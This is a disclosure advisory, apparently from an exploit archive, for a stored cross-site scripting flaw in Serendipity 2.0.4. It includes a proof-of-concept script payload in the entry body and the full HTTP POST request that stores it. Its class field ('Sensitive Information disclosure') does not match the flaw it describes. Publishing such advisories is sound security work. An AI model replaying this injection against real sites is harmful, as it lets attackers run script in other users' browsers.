S9Y Serendipity 2.0.4 Cross Site Scripting
Posted on 01 November 2016
======================================== Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting Application: Serendipity Class: Sensitive Information disclosure Versions Affected: <= latest version Vendor URL: http://docs.s9y.org/ Software URL: http://docs.s9y.org/downloads.html Bugs: Persistent Cross Site Scripting Date of found: 29.10.2016 Author: Besim ======================================== 2.CREDIT ======================================== Those vulnerabilities was identified by Meryem AKDOAAN and Besim ALTINOK 3. VERSIONS AFFECTED ======================================== <= latest version 4. TECHNICAL DETAILS & POC ======================================== Stored Cross Site Scripting (No Admin Required) ======================================== 1) Editor login panel 2) User click 'New Entry' 3) Attacker(normal user) enter xss payload to 'Entry Body' input 4) Vulnerability Parameter and Payload : &body=<Script>alert('Meryem ExploitDB')</Script> ### HTTP Request ### POST /serendipity/serendipity_admin.php? HTTP/1.1 Host: site_name User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new Cookie: --- Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 762 - POST DATA serendipity[action]=admin &serendipity[adminModule]=entries &serendipity[adminAction]=save &serendipity[id]= &serendipity[timestamp]=1477314176 &serendipity[preview]=false &serendipity[token]=324fa32a404e03de978d9a18f86a3338 &serendipity[title]=New Page &serendipity[body]=<Script>alert('Meryem ExploitDB')</Script> &serendipity[extended]= &serendipity[chk_timestamp]=1477314176 &serendipity[new_timestamp]=2016-10-24 15:02 &serendipity[isdraft]=false &serendipity[allow_comments]=true &serendipity[had_categories]=1 &serendipity[propertyform]=true &serendipity[properties][access]=public &ignore_password= &serendipity[properties][entrypassword]= &serendipity[change_author]=4